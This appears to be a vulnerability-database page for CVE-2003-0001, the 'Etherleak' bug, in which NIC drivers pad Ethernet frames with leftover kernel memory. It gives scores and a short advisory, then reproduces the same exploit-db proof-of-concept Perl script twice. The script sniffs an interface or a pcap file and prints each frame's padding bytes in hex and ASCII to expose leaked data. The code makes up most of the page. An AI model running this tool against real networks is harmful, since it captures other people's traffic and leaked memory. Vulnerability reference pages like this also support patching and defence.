CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak.
Exposure of Sensitive Information to an Unauthorized Actor The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
5
AV:N/AC:L/Au:N/C:P/I:N/A:N
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
44.55%
–
–
2023-03-12
–
–
–
2.67%
–
2023-06-25
–
–
–
2.33%
–
2023-10-22
–
–
–
2.33%
–
2024-03-31
–
–
–
2.33%
–
2024-06-02
–
–
–
2.63%
–
2024-08-25
–
–
–
2.63%
–
2024-12-22
–
–
–
25.72%
–
2025-01-19
–
–
–
25.72%
–
2025-03-18
–
–
–
–
1.3%
2025-03-30
–
–
–
–
1.62%
2025-04-15
–
–
–
–
1.62%
2025-04-15
–
–
–
–
1.62,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Publication date : 2007-03-22 23h00 +00:00 Author : Jon Hart EDB Verified : Yes
source: https://www.securityfocus.com/bid/6535/info
Network device drivers for several vendors have been reported to disclose potentially sensitive information to attackers.
Frames that are smaller than the minimum frame size should have the unused portion of the frame buffer padded with null (or other) bytes. Some device drivers fail to do this adequately, leaving the data that was stored in the memory comprising the buffer prior to its use intact. Consequently, this data may be transmitted within frames across Ethernet segments. Since the Ethernet frame buffer is allocated in kernel memory space, sensitive data may be leaked.
Cisco has stated that the IOS 12.1 and 12.2 trains are not affected.
National Semiconductor Ethernet controller chips are not vulnerable to this issue.
#!/usr/bin/perl -w
# etherleak, code that has been 5 years coming.
#
# On 04/27/2002, I disclosed on the Linux Kernel Mailing list,
# a vulnerability that would be come known as the 'etherleak' bug. In
# various situations an ethernet frame must be padded to reach a specific
# size or fall on a certain boundary. This task is left up to the driver
# for the ethernet device. The RFCs state that this padding must consist
# of NULLs. The bug is that at the time and still to this day, many device
# drivers do not pad will NULLs, but rather pad with unsanitized portions
# of kernel memory, oftentimes exposing sensitive information to remote
# systems or those savvy enough to coerce their targets to do so.
#
# Proof of this can be found by googling for 'warchild and etherleak', or
# by visiting:
#
# http://lkml.org/lkml/2002/4/27/101
#
# This was ultimately fixed in the Linux kernel, but over time this
# vulnerability reared its head numerous times, but at the core the
# vulnerability was the same as the one I originally published. The most
# public of these was CVE-2003-0001, which was assigned to address an
# official @stake advisory.
#
# This code can be found its most current form at:
#
# http://spoofed.org/files/exploits/etherleak
#
# Jon Hart <jhart@spoofed.org>, March 2007
#
use strict;
use diagnostics;
use warnings;
use Getopt::Long;
use Net::Pcap;
use NetPacket::Ethernet qw(:ALL);
use NetPacket::IP qw(:ALL);
my %opts = ();
my ($iface, $err, $pcap_t, $pcap_save, $filter_string);
GetOptions( \%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or
die "Unknown option: $!\n" && &usage();
if (defined($opts{'help'})) {
&usage();
exit(0);
}
if (defined($opts{'read'})) {
$pcap_t = Net::Pcap::open_offline($opts{'read'}, \$err);
if (!defined($pcap_t)) {
print("Net::Pcap::open_offline failed: $err\n");
exit 1;
}
} else {
if (defined($opts{'interface'})) {
$iface = $opts{'interface'};
} else {
$iface = Net::Pcap::lookupdev(\$err);
if (defined($err)) {
print(STDERR "lookupdev() failed: $err\n");
exit(1);
} else {
print(STDERR "No interface specified. Using $iface\n");
}
}
$pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \$err);
if (!defined($pcap_t)) {
print("Net::Pcap::open_live failed on $iface: $err\n");
exit 1;
}
}
my $filter;
if (Net::Pcap::compile($pcap_t, \$filter, defined($opts{'filter'}) ? $opts{'filter'} : "", 0, 0) == -1) {
printf("Net::Pcap::compile failed: %s\n", Net::Pcap::geterr($pcap_t));
exit(1);
}
if (Net::Pcap::setfilter($pcap_t, $filter) == -1) {
printf("Net::Pcap::setfilter failed: %s\n", Net::Pcap::geterr($pcap_t));
exit(1);
}
if (defined($opts{'write'})) {
$pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'});
if (!defined($pcap_save)) {
printf("Net::Pcap::dump_open failed: %s\n", Net::Pcap::geterr($pcap_t));
exit(1);
}
}
Net::Pcap::loop($pcap_t, -1, \&process, "foo");
Net::Pcap::close($pcap_t);
if (defined($opts{'write'})) {
Net::Pcap::dump_close($pcap_save);
}
sub process {
my ($user, $hdr, $pkt) = @_;
my ($link, $ip);
my $jump = 0;
my $datalink = Net::Pcap::datalink($pcap_t);
if ($datalink == 1) { $jump += 14; }
elsif ($datalink == 113) { $jump += 16; }
else { printf("Skipping datalink $datalink\n"); return; }
my $l2 = NetPacket::Ethernet->decode($pkt);
if ($l2->{type} == ETH_TYPE_IP) {
$ip = NetPacket::IP->decode(eth_strip($pkt));
$jump += $ip->{len};
} elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; }
else {
# assume 802.3 ethernet, and just jump ahead the length
for ($l2->{dest_mac}) {
if (/^0180c200/) {
# spanning tree
# l2->{type} here will actually be the length. HACK.
$jump += $l2->{type};
}
elsif (/^01000ccccc/) {
# CDP/VTP/DTP/PAgP/UDLD/PVST, etc
# l2->{type} here will actually be the length. HACK.
$jump += $l2->{type};
} elsif (/^ab0000020000/) {
# DEC-MOP-Remote-Console
return;
} else {
# loopback
if ($l2->{src_mac} eq $l2->{dest_mac}) { return; }
printf("Skipping datalink $datalink l2 type %s\n", $l2->{type}); return;
}
}
}
if ($hdr->{len} > $jump) {
my $trailer_bin = substr($pkt, $jump);
my $trailer_hex = "";
my $trailer_ascii = "";
foreach (split(//, $trailer_bin)) {
$trailer_hex .= sprintf("%02x", ord($_));
if (ord($_) >= 32 && ord($_) <= 126) {
$trailer_ascii .= $_;
} else { $trailer_ascii .= "."; }
}
# ignore all trailers that are just single characters repeated.
# most OS' use 0, F, 5 or a.
unless ($trailer_hex =~ /^(0|5|f|a)\1*$/i) {
unless ($opts{'quiet'}) {
print("#"x80, "\n");
printf("%s -> %s\n", $l2->{src_mac}, $l2->{dest_mac});
if ($l2->{type} == ETH_TYPE_IP) {
printf("%s -> %s\n", $ip->{src_ip}, $ip->{dest_ip});
}
}
print("$trailer_hex\t$trailer_ascii\n");
if (defined($opts{'write'})) {
Net::Pcap::dump($pcap_save, $hdr, $pkt);
}
}
}
}
sub usage {
print <<EOF;
$0 -- A demonstration of the infamous 'etherleak' bug.
CVE-2003-0001, and countless repeats of the same vulnerability.
Options:
[-h|--help] # this message
[-i|--interface] <interface> # interface to listen on
[-f|--filter] <pcap filter> # apply this filter to the traffic
[-r|--read] <path to pcap> # read from this saved pcap file
[-w|--write] <path to pcap> # write tothis saved pcap file
[-q|--quiet] # be quiet
[-v|--verbose] # be verbose
EOF
}
# milw0rm.com [2007-03-23]
Publication date : 2007-03-22 23h00 +00:00 Author : Jon Hart EDB Verified : Yes
#!/usr/bin/perl -w
# etherleak, code that has been 5 years coming.
#
# On 04/27/2002, I disclosed on the Linux Kernel Mailing list,
# a vulnerability that would be come known as the 'etherleak' bug. In
# various situations an ethernet frame must be padded to reach a specific
# size or fall on a certain boundary. This task is left up to the driver
# for the ethernet device. The RFCs state that this padding must consist
# of NULLs. The bug is that at the time and still to this day, many device
# drivers do not pad will NULLs, but rather pad with unsanitized portions
# of kernel memory, oftentimes exposing sensitive information to remote
# systems or those savvy enough to coerce their targets to do so.
#
# Proof of this can be found by googling for 'warchild and etherleak', or
# by visiting:
#
# http://lkml.org/lkml/2002/4/27/101
#
# This was ultimately fixed in the Linux kernel, but over time this
# vulnerability reared its head numerous times, but at the core the
# vulnerability was the same as the one I originally published. The most
# public of these was CVE-2003-0001, which was assigned to address an
# official @stake advisory.
#
# This code can be found its most current form at:
#
# http://spoofed.org/files/exploits/etherleak
#
# Jon Hart <jhart@spoofed.org>, March 2007
#
use strict;
use diagnostics;
use warnings;
use Getopt::Long;
use Net::Pcap;
use NetPacket::Ethernet qw(:ALL);
use NetPacket::IP qw(:ALL);
my %opts = ();
my ($iface, $err, $pcap_t, $pcap_save, $filter_string);
GetOptions( \%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or
die "Unknown option: $!\n" && &usage();
if (defined($opts{'help'})) {
&usage();
exit(0);
}
if (defined($opts{'read'})) {
$pcap_t = Net::Pcap::open_offline($opts{'read'}, \$err);
if (!defined($pcap_t)) {
print("Net::Pcap::open_offline failed: $err\n");
exit 1;
}
} else {
if (defined($opts{'interface'})) {
$iface = $opts{'interface'};
} else {
$iface = Net::Pcap::lookupdev(\$err);
if (defined($err)) {
print(STDERR "lookupdev() failed: $err\n");
exit(1);
} else {
print(STDERR "No interface specified. Using $iface\n");
}
}
$pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \$err);
if (!defined($pcap_t)) {
print("Net::Pcap::open_live failed on $iface: $err\n");
exit 1;
}
}
my $filter;
if (Net::Pcap::compile($pcap_t, \$filter, defined($opts{'filter'}) ? $opts{'filter'} : "", 0, 0) == -1) {
printf("Net::Pcap::compile failed: %s\n", Net::Pcap::geterr($pcap_t));
exit(1);
}
if (Net::Pcap::setfilter($pcap_t, $filter) == -1) {
printf("Net::Pcap::setfilter failed: %s\n", Net::Pcap::geterr($pcap_t));
exit(1);
}
if (defined($opts{'write'})) {
$pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'});
if (!defined($pcap_save)) {
printf("Net::Pcap::dump_open failed: %s\n", Net::Pcap::geterr($pcap_t));
exit(1);
}
}
Net::Pcap::loop($pcap_t, -1, \&process, "foo");
Net::Pcap::close($pcap_t);
if (defined($opts{'write'})) {
Net::Pcap::dump_close($pcap_save);
}
sub process {
my ($user, $hdr, $pkt) = @_;
my ($link, $ip);
my $jump = 0;
my $datalink = Net::Pcap::datalink($pcap_t);
if ($datalink == 1) { $jump += 14; }
elsif ($datalink == 113) { $jump += 16; }
else { printf("Skipping datalink $datalink\n"); return; }
my $l2 = NetPacket::Ethernet->decode($pkt);
if ($l2->{type} == ETH_TYPE_IP) {
$ip = NetPacket::IP->decode(eth_strip($pkt));
$jump += $ip->{len};
} elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; }
else {
# assume 802.3 ethernet, and just jump ahead the length
for ($l2->{dest_mac}) {
if (/^0180c200/) {
# spanning tree
# l2->{type} here will actually be the length. HACK.
$jump += $l2->{type};
}
elsif (/^01000ccccc/) {
# CDP/VTP/DTP/PAgP/UDLD/PVST, etc
# l2->{type} here will actually be the length. HACK.
$jump += $l2->{type};
} elsif (/^ab0000020000/) {
# DEC-MOP-Remote-Console
return;
} else {
# loopback
if ($l2->{src_mac} eq $l2->{dest_mac}) { return; }
printf("Skipping datalink $datalink l2 type %s\n", $l2->{type}); return;
}
}
}
if ($hdr->{len} > $jump) {
my $trailer_bin = substr($pkt, $jump);
my $trailer_hex = "";
my $trailer_ascii = "";
foreach (split(//, $trailer_bin)) {
$trailer_hex .= sprintf("%02x", ord($_));
if (ord($_) >= 32 && ord($_) <= 126) {
$trailer_ascii .= $_;
} else { $trailer_ascii .= "."; }
}
# ignore all trailers that are just single characters repeated.
# most OS' use 0, F, 5 or a.
unless ($trailer_hex =~ /^(0|5|f|a)\1*$/i) {
unless ($opts{'quiet'}) {
print("#"x80, "\n");
printf("%s -> %s\n", $l2->{src_mac}, $l2->{dest_mac});
if ($l2->{type} == ETH_TYPE_IP) {
printf("%s -> %s\n", $ip->{src_ip}, $ip->{dest_ip});
}
}
print("$trailer_hex\t$trailer_ascii\n");
if (defined($opts{'write'})) {
Net::Pcap::dump($pcap_save, $hdr, $pkt);
}
}
}
}
sub usage {
print <<EOF;
$0 -- A demonstration of the infamous 'etherleak' bug.
CVE-2003-0001, and countless repeats of the same vulnerability.
Options:
[-h|--help] # this message
[-i|--interface] <interface> # interface to listen on
[-f|--filter] <pcap filter> # apply this filter to the traffic
[-r|--read] <path to pcap> # read from this saved pcap file
[-w|--write] <path to pcap> # write tothis saved pcap file
[-q|--quiet] # be quiet
[-v|--verbose] # be verbose
EOF
}
# milw0rm.com [2007-03-23]